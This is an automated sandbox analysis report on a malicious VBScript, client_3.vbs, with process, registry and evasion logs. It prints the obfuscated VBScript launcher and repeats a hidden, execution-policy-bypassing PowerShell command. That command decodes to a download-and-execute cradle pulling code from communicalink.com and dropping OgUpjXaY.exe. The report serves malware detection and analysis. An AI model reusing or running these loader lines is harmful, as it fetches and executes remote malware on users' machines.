Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe "C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5r34s5rb.nu4.ps1

Jump to behavior

Source: classification engine

Classification label: mal96.spyw.evad.winVBS@8/4@2/2

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Code function: 4_2_00C643C0 CoCreateInstance,

4_2_00C643C0

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Code function: 4_2_00C7CEE0 FormatMessageA,_strlen,GetLastError,

4_2_00C7CEE0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Code function: 4_2_00C4B280 GetProcAddress,FreeLibrary,FindResourceA,SizeofResource,LoadResource,LockResource,

4_2_00C4B280

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\client_3.vbs"

Source: OgUpjXaY.exe	String found in binary or memory: config-serial-stopbits
Source: OgUpjXaY.exe	String found in binary or memory: source-address
Source: OgUpjXaY.exe	String found in binary or memory: config-ssh-portfwd-address-family
Source: OgUpjXaY.exe	String found in binary or memory: config-address-family

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Window detected: Number of UI elements: 20

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: CreateObject("Scripting.FileSystemObject")If fso.FolderExists("C:\ProgramData\Microsoft\Windows") Then e = chr(69)Set sh = createobject("sh"& e &"ll.application")execute("pow = ""pow""& e &""rsh""& e &""ll""")sh.ShellExecute "cmD."& e &"x"& e, "/c "& pow &" -nop -w hidd"& e &"n -"& e &"p bypass -"& e &"nc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==", "", "op"& e &"n", 0'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojw

PowerShell case anomaly found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFDA16C00BD pushad ; iretd	3_2_00007FFDA16C00C1
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CFA0A3 push ecx; ret	4_2_00CFA0B6
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C6DCCC push esi; ret	4_2_00C6DCCE
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C6CDE6 push esi; ret	4_2_00C6CDE8
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C6CDAA push esi; ret	4_2_00C6CDAC

Source: OgUpjXaY.exe.3.dr	Static PE information: section name: .00cfg
Source: OgUpjXaY.exe.3.dr	Static PE information: section name: .voltbl

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C48280 IsIconic,SetWindowTextW,SetWindowTextA,	4_2_00C48280
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C483E0 IsIconic,ShowWindow,	4_2_00C483E0
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C48330 IsIconic,SetWindowTextW,SetWindowTextA,	4_2_00C48330

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Code function: 4_2_00C44740 RegisterClipboardFormatA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoInitialize,MessageBoxA,

4_2_00C44740

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6780	Thread sleep count: 6364 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6780	Thread sleep count: 3086 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6832	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6364			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3086			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

API coverage: 5.0 %

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C89C60 GetProcAddress,FindFirstFileA,CloseHandle,		4_2_00C89C60
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00C68D50 GetWindowsDirectoryA,_strlen,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,		4_2_00C68D50

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000003.00000002.965497252.0000015667971000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:Y
Source: powershell.exe, 00000003.00000002.965497252.0000015667927000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: OgUpjXaY.exe, 00000004.00000002.2128801152.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: powershell.exe, 00000003.00000002.965497252.0000015667971000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\@
Source: powershell.exe, 00000003.00000002.961794631.00000156677CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Code function: 4_2_00CF482D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_00CF482D

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CF63E0 mov eax, dword ptr fs:[00000030h]	4_2_00CF63E0
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CF63AF mov eax, dword ptr fs:[00000030h]	4_2_00CF63AF
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CF6424 mov eax, dword ptr fs:[00000030h]	4_2_00CF6424
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CEABA2 mov ecx, dword ptr fs:[00000030h]	4_2_00CEABA2

Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CDE5BD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00CDE5BD
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CF482D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00CF482D
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe	Code function: 4_2_00CDEC1A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00CDEC1A

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: amsi64_6720.amsi.csv, type: OTHER

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded IEX (New-Object Net.Webclient).downloadstring("http://communicalink.com/index.php")
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded IEX (New-Object Net.Webclient).downloadstring("http://communicalink.com/index.php")			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -nop -w hidden -ep bypass -enc sqbfafgaiaaoae4azqb3ac0atwbiagoazqbjahqaiaboaguadaauafcazqbiagmababpaguabgb0ackalgbkag8adwbuagwabwbhagqacwb0ahiaaqbuagcakaaiaggadab0ahaaogavac8aywbvag0abqb1ag4aaqbjageababpag4aawauagmabwbtac8aaqbuagqazqb4ac4acaboahaaigapaa==
